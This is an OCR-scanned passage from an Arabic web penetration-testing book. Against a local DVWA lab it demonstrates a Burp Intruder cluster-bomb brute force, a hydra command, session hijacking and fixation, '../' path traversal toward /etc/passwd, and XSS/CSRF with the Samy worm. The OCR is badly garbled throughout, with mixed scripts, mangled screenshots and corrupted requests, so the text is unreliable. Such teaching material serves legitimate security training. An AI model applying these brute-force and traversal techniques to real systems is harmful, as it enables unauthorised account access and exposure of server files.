تحصل في حال الوصول إلى حساب المدير بسبب الضعف في عملية 
المصادقة. 

سوف نقوم باستخدام محاكة القوة الغاشمة Brute ۴0٣e‏ الموجودة 
في 0۷/۷۸ للقيام بهجوم القوة العاشمة بشكل ع٥ہنا١ه‏ 

هذه العملية ستتم على صفحة ا1۲۷ مبنية على أساس القيام بعملية 
المصادقة وهذا النوع مستخدم في أكثر من 90 من تطبيقات الويب. 
بغض النظر عن التأثيرات المستمرة لاضافة عوامل أآخری في عملية 
المصادقة مثل أسئلة التحدي فإن اسم المستخدم وكلمة المرور تبقى 
الآلية الأكثر انتشاراً في عملية المصادقة. 

هذا الهجوم مختلف عن هجوم کسر هاش کلمات السر بشکل ٥٣ا۴‏ 
والذي قمنا به في فصل سابق باستخدام أداة rمممRi John the‏ ففي 
هذا الهجوم سوف نتفاعل بشكل مباشر مع تطبيق الويب وقاعدة 


اختبار اختراق سيرفرات وتطبيقات الويب 


البيانات التي تقوم بمعالجة اسم المستخدم وكلمة المرور خلال عملية 
المصادقة. 

هجوم القوة الغاشمة بشکل ٥٣:اہہ‏ هو أبطیئ بکثیر من هجوم کسر 
الهاش لكلمة السر بشكل ٥:اه‏ لأننا سوف نقوم بإعادة تقديم الطلب 


في كل مرة إلى تطبيق الويب ويجب أن ننتظر تطبيق الويب حتى يقوم 
بتوليد الإجابة على كل طلب وإرسالها إلينا. 


اعتراض محاولة المصادقة: 


قم بفتح ۴٥۴٥١‏ مutاB‏ من القائمة اليسرى في 0۷۷۸4 وتأکد من إعداد 
مBur‏ كبروكکسي في متصفحك. 

سوف نحاول اعتراض محاولة تسجيل دخول سنرسلها إلى التطبيق لذلك 
تأکد من ان tمntercepا Burp‏ في حالة 0 

سنحاول تخمين اسم المستخدم وكلمة السر بشكل يدوي في صفحة 
HM‏ هذه ولكن لاحقاً ستكون هذه الخطوة أساسية قبل المرحاة 
التالية لذلك أفهم جيداً ماهي البارامترات التي ترسل إلى تطبيق الويب 


خلال محاولة عملية المصادقة العادية. 


لقد قمت باستخدام ا۴مصmھل‏ إسم مستخدم و ۹d٣sswoھaم‏ کلمة سر کہا 
في الشكل التالي: 


اختبار اختراق سيرفرات وتطبيقات الويب 


DUWA) 


az Vulnerability: Brute Force 


Instructions 
Setup / Reset DB 


Login 


Username: 
a 
Command Injection leeccceee 
CSRF 9 

| Login | 


File Inclusion 


FS I. l— — | 


عندما تقوم بتقديم محاولة تسجيل الدخول هذه من خلال الضفط على 


رز «iوها‏ يمكنك رؤية البارامترات في ااuاs‏ pں٣ط‏ من القائمة y×ہ٣م‏ کہا 
في الشكل التالي: 


Burp Intruder Repeater Window Help 


Target | #0 | Spider | Scanner | Intruder | Repeater j Sequencer | Decoder | Comparer | Extender | Options 


| Intercept | HTTP history | WebSockets history | Options 


Request to http://127.0.0.1:80‏ کا 


Forward Drop Intercept is on ۱ Action 


Raw | Params | Headers | Hex 


EET /dvwa/vulnerabilities/brute/?username=j ameel&password=password&Login=Login HTTP/1.1 

Host: 127.0.0.1 

User-Agent: Mozilla/5.O0 (Xll; Linux x86_64; rv:38.0) Gecko/20100101l Firefox/38.0 Iceweasel/38. 5.0 
Accept: text/html,application/xhtml+txml,application/xnml ; q=0.9,*/*;q=0.8 

Accept-Language: en-US,en; q=0. 5 

Accept-Encoding: gzip, deflate 

Referer: http://127.0.0.1l/dvwa/vulnerabilities/brute/ 

Cookie: security=low; _js_datr=pGSbVoxcbPbhsObQcLSpLKUnh; PHPSESSID=tjé62fipad8SOnfS4iigs2t3t136 
Connection: keep-alive 
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حالياً سوف نهتم فقط ببارامترين: اسم المستخدم وكلمة المرور من أجل 
هذا الهجوم. 

تذكر أننا متأكدون من أن عملية المصادقة هذه سوف تفشل ولكن 
هدفنا الرئيسي هو الحصول على محاولة مصادقة في سجل التاريخ 
الخاص بالبروكسي الخاص بنا. 

يمكننا تغير قيم البارامترات لاستغلال الضعف في عملية المصادقة 
يمكننا الآن توجيه هذا الطلب إلى التطبيق بالاضافة إلى سلسلة من 
الطلبات حتى نحصل على اسم المستخدم وكلمة المرور الصحيحة. 
إحدى خصائص بروكسي الويب أنه يراقب كل طلب وإجابة تمر من خلاله 
ثم يمكنك بعدها العودة وفحص (آو إعادة استخدام) آي طلب تريده 

و هذا هو سبب قيامنا بمحالة المصادقة أول مرة, بالتأكيد ستكون 
محاولة فاشلة ولكننا بحاجة إلى الطلب الذي يحوي على كل شيء 
صحيح ما عاد اسم المستخدم وكلمة المرورء يمكنك رؤية كل الطلبات 
المتشكاة مj‏ خlاJ proxy tool of Buro «gû history tab‏ 

نت الآن تنظر إلى محاولة المصادقة التي تم تشكيلها باستخدام اسم 
المستخدم password jwull ãolكSg Jameel‏ 


اختبار اختراق سيرفرات وتطبيقات الويب 


كما يظهر بالشكل التالى: 


Burp Intruder Repeater Window Help 


Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Options | Alerts | 
Intercept [| HTTP history | WebSockets history | Options 


Filter: Hiding CSS, image and general binary content 


|# û| Host | Method | URL | Params 1 Edited 1 Status 1 Length 0 MIME type 
47 http://127.0.0.1 GET /dvwa/vulnerabilities/brute/ 2 0O 200 5313 HTML 
48 http://127.0.0.1 GET /dvwaf/vulnerabilitie s/brute/ 2 O 200 S313 HTML 
49 http://127.0.0.1 GET /dvwa/vulnerabilities/brute/?user... 3 O 200 5365 HTML 


:Burp Intruder alal 
يمكنك الآن استخدام هذا الطلب كهيكل لمحاولة استغلال صفحة‎ 
المصادقة هذه, وذلك باستخدام أسماء مستخدمين وكلمات مرور‎ 

e 


للقيام بذلك وبكل بساطة قم بالضغط بالزر اليميني على الطلب واختر 
to intruder‏ امه کما في الشکل التالي: 


اختبار اختراق سيرفرات وتطبيقات الويب 


Durp Saite Frve Edition v1.6.31 


Dun Hinader Neoeoce!r Wndon Hels 
Terget Jn] Setter | Suanaar | vervder Reenter | Seweacer | Cecsger | Cemeerer | Eanenger Ovens | ere | 


HA 
HA 


Wane’ bday @ryte f | 
VWinerebiay nie Ff 


Fatt ardepattaordlkl sgn ~o ge 


raroms CORO )\Slotus leng | MIE $ıpa  Censicon | THe 
99 زر‎ 
OQ 0 9 919 


hep 127.0 0 1Nivma iner 
Remove from tiope 
Spnder Vom here 


Send la Ferseer 

Send la Sequentet 

Send ta Comoorer lrequenti! 
Send ta Comoorer \reaponsel 
Show reaponae in breomner 
Reguert n bronnesr 
CFngagermaest trois (Pra weren ory] 
SHOR 14m MIECy mrdoa 
Add cormert 

مو 

Delete Kerr 

Clear Nabory 

Cewr U. 

Ceey as Cur Command 

Cewy iris 

Sore hem 

Fremy bisisey hele 


Neer Iidıng C53, image and genaral binary cecrtent 


Method | URL 
afr (êva awne: abane steve, 
off Ora a/eainer sb ûbe 1c be vt e/ 


© a) mont 
47 Nem VAI 001 
a eA? 001 


أ 1“ 


aa - 
Ram | Param | Headers | Nex 


lf /(OFWaA/ VWULIROIADLIIN GSS / DIR © / SS IRAnS <) ance lA pan ovwor ayaa vd 
Hona: 127.001 

Ago Masi 110/1, © OOD) haus O_O fy O OT Cemo o0q 
leocept:i terr /Okal, appiicatiumn/ dani oxml , appiicarian/ ssl q0 9, 
hecvept"kangusge: on Ul, onq"O 4 

loept -Inecaing geip, olla 

Kefenet. hecp //15% 00. 1/Orwa/wulaat abi tin 104 bana a/ 

Cookie: vecurityeirwi _j_Gmn pO ODOCLIpIh MPEEIA 
Cannaotiom hoeeg-alkive 


ntruderا :Burp‏ اداۃَ تعمل بشکل آتوماتیکی ضد تطبيقات الويب ولكن 


يجب عليك تزويدها بقيم البارمترات و sلههالإةم‏ الذي تختاره 


في Positions tab of Intruder‏ يمكنك رؤیة خمس برامترات ملونة 
والتي يمكنك القيام بهجوم القوة الغاشمة عليها كما في الشكل 


التالي: 


اختبار اختراق سيرفرات وتطبيقات الويب 


Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer |j Decoder | Comparer | Extender | Options | Alerts 


=a 


@ Payload Positions 


Configure the positions where payloads will be inserted into the base request. The attack type determines the way in which payloads are 
assigned to payload positions - see help for full details. 


Attack type: | Sniper 


GET /dvwa/vulnerabilities/brute/?username= 
Host: 127.0.0.1 

User-Agent: Mozilla/5.0 (Xll; Linux x86_64; rvw:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38. 5.0 
Accept: text/html, application/xhtml+xml, application/xml 7; q=0.9,*/*;q=0.8 

Accept-Language: en-US,en; q=0. 5 

Accept-Encoding: gzip, deflate 

Referer: http://127.0.0.1/dvwa/vulnerabilities/brute/ 


Cookie: security= MEE: _;s_dacr-RRESETEEBTEETEOETEEIETEEN; rirsrss 10-REIESERREREIREEEEES 
Connection: keep-alive 


&password= &Login= EET 


هذه البرامترات الخمسة هي نفسها البارمترات التي رأيناها في الطلب 
الذي قمنا باعتراضه 


حالياً سوف نهتم فقط باسم المستخدم وكلمة المرورء لكي يتجاهل 
intruder‏ البارمترات الثلاثة الباقية يجب أن تقوم بمسح الإشارة $ قبل 
وبعد قيمة البراميتر لتحصل على الشكل التالى: 


GET /dvwa/wulnerabilities/brute/?usernane = MEE Ispasswor a-SBAS ES IQScLogin=Login BTL 
Host: 127.0.0.1 


User-Agent: Mozilla/5.O0 (Xll; Linux x86_64; rv:38.0) Geckto/20100101 Firefox/38.0 
Iceweasel/38. 5.0 

Accept: text/html, application/xhtmltxml,application/xnml 7; q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0. 5 

Accept-Encoding: gzip, deflate 

Referer: http://l127.0.0.1/dvwa/vulnerabilities/brute/ 


Cookie: security=low; _js_datr=pGSbVoxcbPbhsObQcLSpLKUnh; PHPSESSID=tjé62fipad8OnfS4iigs2t3t136 
Connection: keep-alive 
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:Intruder Payloads 
يجب أن نأخذ بعين الاعتبار نوع الهجوم الذي نريد القيام به‎ 


dog Intruder‏ أنواع مختلفة من الهجمات والتي يمكنك اختيار احداها 
في هذا الھجgمp cluster bomb attack رlîڌi dg‏ 


Target | Proxy | Spider Scanner j Intruder | Repeater Sequencer | Decoder | Comparer | Extender | Options | Alerts 
4 a... 
Target | Positions | Payloads | Options 


(2) Payload Positions 


Configure the positions where payloads will be inserted into the base request. The attack type determines the way in which payloads are 
assigned to payload positions - see help for full details. 


Attack type: | Cluster bomb 


ا 


Runtime file oii dgu g 


يجب أن نستخدم ملف نصي يحوي على قائمة كبيرة بأسماء 
المستخدمين وملف نصي آخر يحوي على عدد كبير من كلمات السر 
يوجد العديد من المواقع على الانترنت و التي يمكنك أن تحصل هذه 
الملفات منها. 


اختبار اختراق سيرفرات وتطبيقات الويب 


من أجل البرامتر الأول سوف نستخدم الملف النصي الذي يحوي على 
قائمة بأسماء المستخدمين 


Extender 


Scanner | Intruder 


4 > a... | 
Target | Positions i Payloads | Options | 


[Repeater | 


You can define one or more payload sets. The number of payload sets depends on the attack type defin 
payload types are available for each payload set, and each payload type can be customized in different ı 


Payload set: |1 ( Payload count: 1 (approx) 
Payload type: | Runtime file ”( Request count: 1 (approx) 


Payload Options [Runtime file] 


5 


This payload type lets you configure a file from which to read payload strings at runtime. 


Select file ... \/rootluser_name_list.txt 


ومن أجل البرامتر الثاني سوف نستخدم الملف النصي الذي يحوي على 
قائمة بكلمات السر 


Sequencer | Decoder | Comparer | Extender 


You can define one or more payload sets. The number of payload sets depends on the attack type defin 
payload types are available for each payload set, and each payload type can be customized in different ı 


Payload set: | 2 |) Payload count: 1 (approx) 


Payload type: | Runtime file ( Request count: 1 (approx) 


(2J Payload Options [Runtime file] 


This payload type lets you configure a file from which to read payload strings at runtime. 


Select file ... Iroot/password_list. txt 


——_ 
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لبداً هذا الهجوم سوف نقوم بالضغط على start attack‏ 


Target | Proxy | Spider | Scanner j Intruder |j Repeater | Sequencer | Decoder j Comparer | Extender | Options | Alerts 


4 I... 
[Target Positions | Payloads | Options 
@ Attack Target | Start attack | 


Configure the details of the target for the attack. 
Host: 127.0.0.1 
Port: 80 


O Use HTTPS 


Attack Save Columns 
Results | Target | Positions | Payloads | Options 


Filter: Showing all items 2 


Request A  Payload1l Payload2 | Status | Error | Timeout | Length | Comment 

0 200 0 0 5328 1a 
1 admin admin 200 ٠ O 5328 

2 syria admin 200 O O 5328 

3 jameel admin 200 0 O 5328 

4 root admin 200 0O O 5328 

5 adminl admin 200 0 ك‎ 5328 

6 admin password 200 . O 5328 

7 syria password 200 0 O 5328 

8 jameel password 200 ٠ O 5328 

9 root password 200 O ك‎ 5328 

10 adminl password 200 0 O 5328 

11 admin pass1234 200 2 O 5387 

12 syria pass1234 200 Û 2 5328 چ‎ 
E | iamaal|l nas<1 24 2nn C1 3 228 


سيتم استخدام كل اسماء المستخدمين وكلمات السر حتى الحصول على 
اسم المستخدم وكلمة السر الصحيحة. 


يوجد العديد من الخيارات التي يمكن استخدامها في هذا الهجوم 
كما يمكن القيام بهذا الهجوم باستخدام الأداة a٣dر1×‏ 


(موجودة بشكل تلقائي في الكالي) ولها واجهة رسومية بسيطة ومن 
السهل التعامل معها 
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xHydra © © 0 
Quit 
Target Passwords Tuning Specific Start 
Target 


@ Single Target 127.0.0.1/ 
O Target List 


[] Prefer IPV6 


Port 80 


Protocol https-post-form 


Output Options 


ÛJ) Use SSL [] Be Verbose 
W Show Attempts [J Debug 
[J COMPLETE HELP [J] Service Module Usage Details 


hydra -s 80 -V -L /root/file.txt -P /root/file.txt -e s -t 16 -u -m 127.0.0.1/ https-post-form 
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مهكlجnمة‏ l|lجlلwuة :Session Attacks‏ 
التالي هو بعض أنواع الهجمات التي تستخدم لاستفلال ثغرات الجلسة 


٠‏ سرقة الجلسة وہا)cمزhi Session‏ :يتم ذلك بسرقة فعرف 
المستخدم وإعادة استخدامه من قبل مختبر الاختراق. 
سرقة فعرف المستخدم يمكن أن تتم بعدة طرق مختلفة ولكن 88× 
هي الطريقة الأكثر شيوعاً, سوف نتحدث عن 88× لاحقاً في هذا 
الكتاب 

٠‏ تثبيت الجلسة nەixati؟ :Session‏ تحدث عندما يقوم مختبر الاختراق 
بتخصيص فعرف جلسة شرعي من التطبيق لمستخدم غير معروف. 
هذا یتم عادتاً من خلال عنوان اUR‏ طس المستخدم يجب أن يضفط 
على الرابطء وعندما يضغط على هذا الرابط ويقوم بتسجيل الدخول 
إلى التطبيق عندها يقوم المهاجم باستخدام نفس مُعرف الجلسة. 
هذا الهجوم يحدث أيضاً عندما يقبل سيرفر الويب أي جلسة من 
المستخدم (أو المهاجم) ولا يقوم بتخصيص جلسة جديدة فوق 
المصادقة. في هذه الحالة مختبر الاختراق سوف يختار جلسته التي 
قام بتحديدها مسبقاً ويرسلها إلى الهدف 
هذا الهجوم يعمل لأن فعرف الجلسة يسمح بإعادة استخدامه في 


جلسات متعددة. 


اختبار اختراق سيرفرات وتطبيقات الويب 


" منح الجلسة 0nنأdona‏ صSessio:‏ هذا الهجوم شبيه حداً بتتبيت 
الجلسة ولكن بدلاً من تخصيص فعرف المستخدم, فإن مختبر الاختراق 
سيقوم بتقديم فعرف الجلسة (جلسة المهاجم) إلى المستخدم على 
أمل أن يقوم المستخدم بإكمال العملية بدون معرفة. 
المثال الكلاسيكي هو هجوم التصيد وہأطءنإم محاولة خداع 
مستخدمي الإنترنت للحصول على بياناتهم الشخصية (مثل كلمة السر 
أو رقم بطاقة الائتمان) عن طريق إنشاء صفحة ويب مطابقة تماما 
لموقع مؤسسة رسمية وعندما يقوم الهدف بإدخال اسم المستخدم 
وكلمة المرور سوف ترسل هذه المعلومات إلى ملف خاص بمختبر 


الاختراق. 


٠‏ فعرف الجلسة في عنوان ا8ل: 
تتم عندما يتم تمرير فُعرف الجلسة كبرامتر في عنوان ا0۸ خلال 
عملية الطلب والإجابة 
اذا كانت هذه العملية موجودة فإن مختبر الاختراق يستطيع ارسال 
عنوان ا۸ل إلى المستخدم والقيام بعمليات الهجوم المشروحة 
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سابقا. 


اختبار اختراق سيرفرات وتطبيقات الويب 


الهجوم على الكوكيز القابل للتطبيق يتمحور حول مبداً إعادة استخدام 

الکوکیز. ليس مهم من قام بإصدار الکوكيز أو كيف يقوم مختبر الاختراق 

بسرقة الكوكيز أو كيف يخطط لاعادة استخدامها ولكن المهم فقط هو 

أن يكون تطبيق الويب يعمل بشكل كامل مع الكوكيز القديمة «ويمكن 

اكتشاف ذلك بسهولة. 

يمكن القيام بسلسلة من الاختبارات ضد تطبيق الويب لمعرفة اذا كانت 

ثغرة إعادة استخدام الكوكيز موجودة في التطبيق 

١‏ قم بتسجيل الخروج من التطبيق تم قم بالضغط على زر العودة في 
المتصفح وقم بتحديث الصفحة لترى فيما إذا كان بإمكانك الاستمرار 
بالوصول إلى الصفحة في تطبيق الويب وذلك في الصفحات التي 
تحتاج إلى جlلسة active session alleû‏ 

١‏ انسخ وألصق فعرف جلستك إلى مستند نصي وقم بإعادة استخدامه 
بعد القيام بعملية تسجيل الخروج من التطبيق, يمكنك استخدام 
intercepting proxy‏ لإاضافة فعرف الجلسة القدیم 

١‏ توقف عن استخدام المتصفح لعدة ساعات لاختبار قيمة الفترة الزمنية 


ال ابی وذلك بعد أن اة فُعرف | . شرعی. 
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٠‏ العديد من تطبيقات الويب ترسل الكوكيز إلى المستخدم عندما يقوم 
بزيارة الموقع حتى وأن لم يقم بعملية تسجيل الدخول .قم بنسخ 
ولصق فعرف الجلسة إلى مستند نصي ثم قم بعملية تسجيل الدخول 
ثم قم بعملية مقارنة لفعرف الجلسة الذي ارسله الموقع قبل تسجيل 
الدخول وفعرف الجلسة بعد القيام بعملية تسجيل الدخول, يجب أن 
يكون القيم مختلفة وإذا لم تكن مختلفة فهذه ثغرة كبيرة في إدارة 
الجلسة. 

١‏ قم بعملية تسجيل الدخول إلى نفس التطبيق من متصفحين مختلفين 
لترى فيما إذا كان التطبيق يدعم تسجيل الدخول المزدوج, إذا كان 
يوجد جلستين إذا كان يوجد فعرف جلسة وحيد سيتم تنبيهك في 
المتصفح الأول بأنه تم تسجيل الدخول إلى نفس الحساب في نفس 


الوقت من مكان أخر. 
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:Path Traversal Attack luall jglجتi هجوم‎ 


يحدث هذا الهجوم عندما يحاول مختبر الاختراق إبطال مفعول أي 
إجراءات حماية ومصادقة قام بوضعها مدير التطبيق ومبرمج التطبيق 
للسماح لمستخدمي التطبيق بالوصول فقط إلى مجلدات معينة دون 
مجلدات آخریى. 


هذا النوع من الهجوم يتم عادتاً من قبل مستخدم قام بعملية المصادقة 
في التطبيق ويقوم بفحص المصادر التي يمكن للمستخدم العادي 
الوصول إليها ثم يقوم بخلق طلب خبيث لاستخدامه بالوصول إلى 
المصادر الفير مصرح له بالوصول إليها. 


بنية ملفات سيرفر الويب: 


سوف تختلف بحسب سيرفر الويب. في مثالنا 0۷۷۷۸ فإن بنية المجلدات 
ستكون كما في الشكل التالي: 
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bin etc USF var 
[ 
“tons of ‘passwd 5 
apps file 
SIC 


المجلدات ذات اللون الأزرق هي المجلدات التي يسمح تطبيق الويب 
للمستخدم بالوصول إليهاء وكل المجلدات ذات اللون الأبيض لا يسعح 
لمستخدمي تطبيق الويب الوصول إليها وهي مخصصة فقط لمدير 
تطبيق الويب. 


تنفيذ هجوم تجاوز المسار يسمح لك بالوصول إلى المصادر الغير مصرد 
لك الوصول إليها 


:~# cd /var/wwuw/html/dvwa/dvwa/ 
1 ITM 1 1 5S 


# 


tnc lu 


اختبار اختراق سيرفرات وتطبيقات الويب 


سوف نقوم بهجوم تجاوز المسار (التنقل عبر المجلدات) من أجل الوصول 
إلى المصادر في سيرفر الويب الغير مصرح لنا بالوصول إليها. 

هذه الثغرة تسمح لنا أيضاً برفع ملفات وتغير الإعدادات في سيرفر 
الويب. 

أول مرحلة في هذا الهجوم هي معرفة المكان الموجودة فيه ملفات 
تطبيق الويب على السيرفر ومن ثم محاولة الانتقال لمسارات أخرى 
(مجلدات أعلى) باستخدام التعليمة " /.. “ عدد من المرات لاستغلال ثغرة 
تحاوز المسار. 

المهم أن نصل إلى مجاد ا0٣‏ 

لاختبار هذه التغرة نستخدم هذه التعليمة " /.. ” عدد من المرات إلى أن 


نحصل على العدد الصحيح وهو عدد المجلدات الموجودة في هذا المسار 


LAT ETI 
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۹ے 
DWA)‏ 


Instructions 
Setup / Reset DB 


Brute Force 


Command Injection 


من أجل نجاح هذا الهجوم تأكد من أن مستوى الحماية فى 0۷W۸‏ هو 


low 


استخدمنا " /.. ” 6 مرات من أجل الوصول إلى ١سءءهم/ءاه/‏ وهذا يعني 
أنه يمكننا الوصول إلى ر٣ه†ء dir‏ 0دا بتجاوز الملفات أربع مرات. 


في هذا الهجوم تمكنا من تجاوز المسار المخصص لتطبيق الويب وقمنا 
بكشف معلومات حساسة عن السيرفر الهدف. 


اختبار اختراق سيرفرات وتطبيقات الويب 


fida OT 

۶ e : ET 

sii“‏ . . 5ه 
ioc 1‏ 

uiuduusecansaaoo 


محتوى هذا الفصل: 


cross-site scripting (XSS) " 
cross-site request forgery (CSRF) " 
Social Engineer Toolkit (SET) plخiwlڊ‎ ةيcعlaتüجاJl‎ ةwسدنهلا‎ " 


Human is the key to security 


اختبار اختراق سيرفرات وتطبيقات الويب 


صمقدمة: 


مصطلح المستخدم يشير إلى الجهاز الذي يستخدم من أجل الاتصال 
بالشبكة مثل أجهزة الكمبيوتر أو الأجهزة المحمولة. 

الأشخاص هم عرضة لثغرات كثيرة سوف نناقشها في هذا الفصل. 
A ao ql DTS SS gal ASS‏ 
كطريقة لتعريف من المتصل بتطبيق الويب وماهي التغرات الموجودة 
في نظامه وفيما إذا كان من الممكن تأمين وسيلة للوصول إلى 
معلومات تطبيق الويب. 


التركيز في هذا الفصل سيكون على تعريف أنظمة الوصول إلى 
تطبيقات الويب وتخمين الثغرات واستفلالها إذا كان هذا الأمر ممكن. 


بعض أنواع الهجمات على مستخدم الويب تعتمد على ثغرات موجودة 
في تطبيق الويب والبعض الأخر لا يتطلب وجود أي ثغرة في تطبيق 
الويب ولكن تعتمد فقط على جهل المستخدم وذلك باستخدام الهندسة 
الاجتماعية. 
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:Cross-Site Scripting (XSS) رة‎ 


هي ثغرة منتشرة جداً في تطبيقات الويب, عندما تقوم بزيارة موقع 
ويب فإن متصفحك يطور علاقة موثوقة مع تطبيق الويب. متصفحك 
يفترض أن هذه العلاقة موثوقة لأنه يقوم بالطلب من موقع الويب 
ويجب عليه أن يثق بأي إجابة تعود إليه من تطبيق الويب. 


هذه العلاقة الموثوق بها تسمد للصور والمستندات و السكريبتات من 
تطبيق الويب بالظهور على متصفحك. 


هذه العلاقة لا تكون آمنة عندما يكون التطبيق مصاب بثفرة 58× 


إذا كان التطبيق مصاب بثغرة 58× فإن مختبر الاختراق يستطيع خلق 
طلب لعنوان ا0۴ يحوي على سکریبت خبیث ویقوم بتمریر عنوان ۴1ا 
إلى المستخدم الهدف, إذا قام الهدف بالضغط على هذا الرابط فإن 
الطلب الخبيث سوف يرسل إلى تطبيق الويب, التطبيق سوف يقوم بالرد 
من خلال إرسال إجابة إلى المستخدم تحوي على سكريبت خبيث, هذا 
السكريبت يتولد في السيرفر ويرسل إلى متصفح الهدف ويتم تنفيذه 
في المتصفح. 
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المتصفح سوف يقوم بتنفيذ السكريبت لأنه يثق بتطبيق الويب. 
مختبر الاختراق يجب أن يجد ثغرة 58× في مكان ما من موقع الويب 
وعندما يقوم الهدف بالضغط على الرابط سوف يتم إرسال طلب إلى 
التطبيق وسوف يرد التطبيق بإرسال إجابة يتم تنفيذها في متصفح 
الهدف وهذا يسمح لمختبر الاختراق بحقن سكريبت خبيث في إجابة 
التطبيق اللي يتم إرسالها إلى متصفح الهدف. 

الأداتين الأكثر شهرة لاستغلال هذه الثغرة: 

Cross-Site Scripting Framework (XSSF) 


Browser Exploitation Framework (BeEF) 


:Cross-Site Request Forgery (CSRF) öةjغi‎ 


هذه الثغرة تتطلب ثقة المتصفح بتطبيق الويب وتتطلب أن يقوم مختبر 
الاختراق بخلق طلب خبيث ليتم الضغط عليه من قبل مستخدم جاهل أو 
قليل الخبرة ولكن بدلا من حقن السكريبت الخبيث كما في 88× فإن 
هجوم SR۴‏ يقوم بتنفيذ عمل شرعي في التطبيق بدون معرفة 
المستخدم الهدف. 
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معظم العمليات التي يدعمها التطبيق مثل خلق مستخدم جديد أو 
تغيير كلمة السر أو حذف محتوى موقع الويب يمكن أن تتم بدون إدراك 
المستخدم بaجgم CSRF‏ 


وھذا ھو سبب تسمیته بgjüڊر‏ |Jفطlب request forgery‏ 


:XSS VS CSRF 
وذلك بسبب أن كلا‎ ×88 ه١‎ SR۴ الكثير من الأشخاص يخلطون بين‎ 
التغرتين تتطلب خلق طلب ويب نظامي والتفاعل مع المستخدم لجعله‎ 

يقوم بعمل طلب من تطبيق الويب بدون إدراكه. 

الفرق نش التقنيتب هو آ1 کے آ1 ق م اتف ٠‏ الا |o‏ ل 

5 تستخدم سكريبت في المتصفح بينما ۴۴ تستخدم أي طلب 
P087(‏ ا آGE)‏ لإكمال العمل الشرعي فى التطبيق. 

XSS and SRF‏ يمكن أن يتم استخدامها مع بعض في سلسلة من 
الاستغلالات في الدودة المشهورة ٣٣٠س‏ رص٨هك‏ التي قام بإجادها 
Samy Kamkar‏ والتي عاثت خراباً في c6‏ 2مMy8‏ في عام 2005 

في الواقع هي لم تكن دودة ١۴۳٥س‏ كالبرمجيات الخبيثة التقليدية بل 
كانت هجوم CSR۴‏ 4ه X85‏ والذي انتشر بسرعة لذلك تم تسميته 


wo ٣۳ باسم الدودة‎ 
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الهجموم يحمل استغلال يقوم بإدخال 
"but most of all. Samy is my hero"‏ 


في بروفايل الضحية كما يقوم بإرسال طلب صداقة إلى رصجSŠS‏ 


وعندما يقوم مستخدم أخر في e‏ 2مMy8S‏ بمشاهدة آي بروفایل مصاب 
فإن الاستغلال سوف يتم تنفيذه مرة ثانية وخلال يوم واحد تم 
استغلال أكثر من مليون مستخدم في ١٥2م8/«‏ النص الذي يتم إدخاله 
في بروفايل الضحية يتم بواسطة 88× بينما إرسال طلب الصداقة يتم 
hwlgıةã CSRF‏ 


تغرات الهندسة الاجتماعية التقنية: 


هذا النوع من الثغرات لا يعتمد على أي ثغرات تقنية موجودة في سيرفر 
الويب أو في تطبيق الويب ولكن تعتمد على المستخدم الهدف بشكل 
مباشر. 

هذا النوع من الهجمات لا يمكن إيقافه من خلال طرق الحماية التقليدية 
مثل الجدران النارية كااة س۷٠۴۴‏ وأنظمة كشف ومنع التطفل وبرامج 
مضادات الفروسات وبرامج إزالة البرمجيات الخبيثة أو من خلال ترقيع 
النظام من خلال إجراء التحديثات. 
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استطلاع مستخدم الويب: 


يوجد العديد من المواقع المتوفرة بشكل مجاني والتي تحوي غل اذاه 
اكتشاف تغرات 58× والتي تؤمن مكان جيد للبدء بهجوم 88× 


الموقع و٣ه.١هءء×‏ يحوي مجموعة من المواقع التي تحوي على تغرات 
5 دائمة وحالة كل تغرة 


وهذا الموقع يحوي على أكبر أرشيف للمواقع المصابة بثغرة 88× كما 
يمكنك التسجيل في هذا الموقع من أجل الحصول على أخر التحديثات 
الخاصة بمحتوى هذا الموقع و يمكنك القيام ببحث سريع في أرشيف 
هذا الموقع لترى فيما إذا كان الهدف الخاص تم وضعه في هذا 
الموقع على أنه موقع مصاب. 

يوجد أيضاً قسم من الهندسة الاجتماعية التقليدية المتضمنة هجمات 


يمكنك اکتشاف ثغرات SR۴‏ ١ه‏ 88× ويمكنك بناء استفلال لها ولکن 
أنت بحاجة لمستخدم شرعي لتقوم بإرسال الطلب الخبيث من خلاله إلى 
تطبيق الويب وهذا الطلب يمكن أن يكون من خلال رابط أو صورة أو 
فديو أو إعادة التوجيه لموقع أخر أو أي طريقة أخرى يمكن أن تقود 
المستخدم من خلالها ليقوم بالقيام بهذا الطلب. 
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من أجل القيام بذلك بطريقة لا تثير شك المستخدم فإن مختبر الاختراق 
الجيد يجب أن يكون ماهر في استخدام الهندسة الاجتماعية من أجل أن 
يحصل على ثقة المستخدم الهدف. 

هناك فائدة من جمع عدة حسابات والتي يمكن من خلالها التحكم 
بالتطبيق الهدف, يمكن استخدام هذه الحسابات من أجل التفاعل مع 
المستخدم الهدف كجزء من هجوم الهندسة الاجتماعية كما يمكن 
استخدام هذه الحسابات من أجل اختبار وتجربة الاستفلالات قبل 
استخدامها ضد المستخدم الهدف كالقيام بإرسال روابط بين هذه 
الحسابات لرؤية فيما إذا كانت عملية تسليم الاستغلال تتم بالشكل 


المطلوب و هذا يسمحد لمختبر الاختراق بأن يلعب دود المهاجم والضحية 


فحص مستخدم الويب: 

عندما تجد موقع مصاب بثغرة 88× فأنت بحاجة لن تأخذ هذه 
المعلومات وتقوم بخلق استغلال جيد لاستخدامه ضد الموقع الهدف 
محور هجوم ×SS or CSR۴‏ ھو أن یقوم المستخدم بالضغط على رابط 
يقوم بإرسال طلب اومuوه۴‏ إلى تطبيق الويب وهذا الطلب يحوي على 


malicious script ûıڊخ سکریبت‎ 


الجزء السهل من ثغرات SR۴‏ ۲ه 88× هو اكشتافها وبناء الاستغلال 
الخاص بها 
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الجزء الصعب في هجوم CSR۴‏ اه ×SS‏ هو خداع المستخدم لكي يقوم 
بالضغط على الرابط الخبيث من خلال استخدام هجمات الهندسة 
الاجتماعية 
ثغرات and CSR۴‏ 88× أصبح من الصعب اكتشافها بسبب التقنيات 
e oo 1|‏ مة في جانب || 0 م (في || e‏ . ) متٿل 

JavaScript, ActiveX, Flaxh, and Silverlight 
والتي تساعد في عرض الصفحة النهائية لدى المستخدم.‎ 
لأنه من‎ ×88 and CSR۴ هذه التقنیات تزید من صعوبة ایجاد ثغرات‎ 
الصعب القيام بعملية فحص اتوماتيکي على الكود في جانب المستخدم.‎ 


